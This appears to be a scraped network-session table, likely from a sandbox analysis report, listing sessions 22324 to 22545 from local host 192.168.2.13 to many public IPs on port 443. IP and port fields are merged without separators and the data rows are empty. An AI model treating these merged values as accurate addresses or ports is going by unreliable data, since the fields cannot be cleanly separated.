                                    22324192.168.2.1347994217.179.242.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22325192.168.2.133528271.253.250.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22326192.168.2.1348744126.15.86.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22327192.168.2.134129898.125.109.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22328192.168.2.1337404152.119.197.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22329192.168.2.1337722105.1.174.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22330192.168.2.1339714169.34.148.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22331192.168.2.1332894114.132.174.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22332192.168.2.1360794179.118.49.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22333192.168.2.1357622112.157.13.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22334192.168.2.136095444.38.254.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22335192.168.2.135115481.187.217.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22336192.168.2.136053899.119.7.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22337192.168.2.134897690.84.102.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22338192.168.2.135242867.197.219.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22339192.168.2.1339650117.45.218.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22340192.168.2.134536878.96.168.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22341192.168.2.1334196160.1.84.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22342192.168.2.135755893.154.97.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22343192.168.2.1356562174.132.158.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22344192.168.2.136040439.254.25.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22345192.168.2.135023231.98.152.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22346192.168.2.1351948169.24.215.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22347192.168.2.1349774210.243.74.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22348192.168.2.1357916165.115.26.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22349192.168.2.1348312218.166.223.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22350192.168.2.1343978138.136.217.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22351192.168.2.1335776146.244.52.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22352192.168.2.136016457.150.178.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22353192.168.2.1347176143.221.55.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22354192.168.2.136001061.146.96.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22355192.168.2.1340084153.186.20.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22356192.168.2.1333270112.67.25.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22357192.168.2.1333198167.44.108.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22358192.168.2.135846447.76.107.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22359192.168.2.1336630212.122.126.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22360192.168.2.1334854196.208.82.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22361192.168.2.1355334103.103.23.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22362192.168.2.1335066155.82.218.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22363192.168.2.1358228139.7.55.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22364192.168.2.1352678182.36.65.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22365192.168.2.1333726183.11.90.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22366192.168.2.1340888176.11.138.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22367192.168.2.1340964159.130.202.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22368192.168.2.133501865.128.167.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22369192.168.2.1347036147.45.116.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22370192.168.2.134368262.153.206.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22371192.168.2.135443282.225.220.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22372192.168.2.133948087.60.63.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22373192.168.2.1335002112.106.226.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22374192.168.2.1348234175.192.20.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22375192.168.2.134180453.232.219.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22376192.168.2.134722418.103.200.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22377192.168.2.134402085.244.120.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22378192.168.2.134093044.75.44.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22379192.168.2.1347980174.60.208.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22380192.168.2.1352542153.63.119.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22381192.168.2.135276620.201.113.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22382192.168.2.1345048102.160.222.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22383192.168.2.134004640.200.0.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22384192.168.2.1338592146.243.185.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22385192.168.2.1344428148.132.228.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22386192.168.2.133356058.169.134.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22387192.168.2.1333720106.49.55.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22388192.168.2.135564276.103.165.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22389192.168.2.133875427.34.240.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22390192.168.2.1345768206.34.7.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22391192.168.2.13579629.39.229.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22392192.168.2.1346738217.120.97.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22393192.168.2.1357230115.229.107.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22394192.168.2.1337696123.159.90.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22395192.168.2.133514882.155.46.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22396192.168.2.1344698136.52.195.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22397192.168.2.135449236.199.210.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22398192.168.2.1335288174.187.8.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22399192.168.2.1353494158.6.184.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22400192.168.2.136078482.95.178.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22401192.168.2.1334684173.101.112.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22402192.168.2.1350026177.107.173.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22403192.168.2.1352818168.221.83.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22404192.168.2.1352994164.227.152.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22405192.168.2.1360120105.88.132.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22406192.168.2.133691262.112.159.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22407192.168.2.136055412.118.72.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22408192.168.2.134699666.146.173.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22409192.168.2.1349448164.167.12.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22410192.168.2.134529496.185.160.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22411192.168.2.1351942207.102.228.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22412192.168.2.1351510149.168.109.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22413192.168.2.135166858.254.135.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22414192.168.2.134633675.99.20.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22415192.168.2.1341412144.123.76.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22416192.168.2.135047482.165.84.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22417192.168.2.133746067.121.73.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22418192.168.2.13376264.164.218.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22419192.168.2.135916486.102.217.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22420192.168.2.1338672124.48.226.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22421192.168.2.135536619.126.188.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22422192.168.2.1333686178.158.161.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22423192.168.2.134450444.237.94.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22424192.168.2.1344326116.234.225.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22425192.168.2.1334708164.232.14.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22426192.168.2.1336998213.74.57.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22427192.168.2.134041459.105.84.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22428192.168.2.1332848119.239.110.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22429192.168.2.1346134173.155.162.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22430192.168.2.135278650.90.171.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22431192.168.2.134347018.86.9.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22432192.168.2.1341190186.35.2.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22433192.168.2.1342548194.0.23.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22434192.168.2.1339996132.47.53.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22435192.168.2.1354982200.153.246.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22436192.168.2.1355864176.182.5.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22437192.168.2.1358806119.29.141.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22438192.168.2.1358246188.170.149.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22439192.168.2.135799851.169.180.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22440192.168.2.1345528209.196.27.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22441192.168.2.13451728.99.202.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22442192.168.2.135966624.199.222.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22443192.168.2.134995495.111.54.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22444192.168.2.1355792187.163.52.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22445192.168.2.1357436179.213.138.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22446192.168.2.1338942103.7.101.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22447192.168.2.135718818.67.153.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22448192.168.2.1333232209.173.78.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22449192.168.2.133622841.138.59.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22450192.168.2.134841886.162.233.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22451192.168.2.1344692150.64.249.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22452192.168.2.1334270142.108.246.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22453192.168.2.135826491.29.12.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22454192.168.2.1334098213.246.149.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22455192.168.2.135563268.191.216.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22456192.168.2.13409885.33.155.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22457192.168.2.1359508136.229.193.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22458192.168.2.134745257.105.134.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22459192.168.2.1349398170.183.43.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22460192.168.2.133990097.122.45.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22461192.168.2.135845674.240.211.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22462192.168.2.134317425.181.137.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22463192.168.2.1359334158.75.108.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22464192.168.2.1336014138.132.32.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22465192.168.2.1333254102.216.200.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22466192.168.2.133468053.152.61.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22467192.168.2.1351008150.46.100.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22468192.168.2.133906645.205.96.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22469192.168.2.1351326203.135.97.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22470192.168.2.1346564156.243.195.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22471192.168.2.1344828180.208.102.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22472192.168.2.1349930204.196.125.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22473192.168.2.1355958123.86.96.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22474192.168.2.1344320175.51.199.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22475192.168.2.134430224.72.16.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22476192.168.2.1335924190.30.162.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22477192.168.2.1347202198.65.241.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22478192.168.2.133874435.141.140.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22479192.168.2.1359752174.17.247.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22480192.168.2.133722649.70.31.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22481192.168.2.133379839.179.232.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22482192.168.2.1356372206.187.121.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22483192.168.2.1344828178.33.90.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22484192.168.2.1339488175.112.179.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22485192.168.2.1343128121.168.94.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22486192.168.2.1348992132.245.208.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22487192.168.2.1336378203.82.102.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22488192.168.2.135415259.52.245.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22489192.168.2.1353328107.130.85.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22490192.168.2.1352338218.233.171.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22491192.168.2.1345342161.119.229.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22492192.168.2.1339328160.231.228.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22493192.168.2.1340816219.50.106.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22494192.168.2.13399421.188.208.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22495192.168.2.1345902139.161.17.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22496192.168.2.1335436178.133.78.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22497192.168.2.1341776209.155.164.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22498192.168.2.133888639.1.78.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22499192.168.2.134549647.94.121.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22500192.168.2.1337766151.148.246.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22501192.168.2.133803476.178.31.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22502192.168.2.1345702114.145.53.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22503192.168.2.13543985.14.243.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22504192.168.2.1358216128.166.194.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22505192.168.2.134093459.37.34.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22506192.168.2.135969447.72.89.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22507192.168.2.1334454175.110.236.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22508192.168.2.135537241.9.76.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22509192.168.2.134066874.218.108.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22510192.168.2.133872618.20.31.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22511192.168.2.1360046139.5.1.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22512192.168.2.1344280138.59.58.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22513192.168.2.1352676217.4.223.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22514192.168.2.133987485.223.227.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22515192.168.2.135898292.15.170.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22516192.168.2.134951827.105.157.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22517192.168.2.1348964109.209.81.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22518192.168.2.135258451.127.29.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22519192.168.2.13411188.37.94.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22520192.168.2.133924662.93.252.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22521192.168.2.1350904148.14.152.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22522192.168.2.1352024144.50.170.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22523192.168.2.1350500198.66.34.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22524192.168.2.1360482118.223.42.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22525192.168.2.1338030117.221.171.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22526192.168.2.1349998173.46.230.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22527192.168.2.1346310210.206.57.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22528192.168.2.133519824.182.75.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22529192.168.2.1333122162.194.179.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22530192.168.2.135909693.67.224.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22531192.168.2.1340194144.254.26.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22532192.168.2.1348822102.163.254.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22533192.168.2.1354320203.47.26.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22534192.168.2.1357486139.154.204.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22535192.168.2.1359794159.238.246.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22536192.168.2.1339710126.103.14.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22537192.168.2.1358048155.6.109.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22538192.168.2.133453898.179.42.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22539192.168.2.1337050173.255.33.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22540192.168.2.1350486183.99.21.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22541192.168.2.1352660130.199.66.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22542192.168.2.1336542157.208.99.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22543192.168.2.1344116118.183.128.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22544192.168.2.1335848210.128.111.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22545192.168.2.1334038189.7.186.120443
                                    TimestampBytes transferredDirectionData


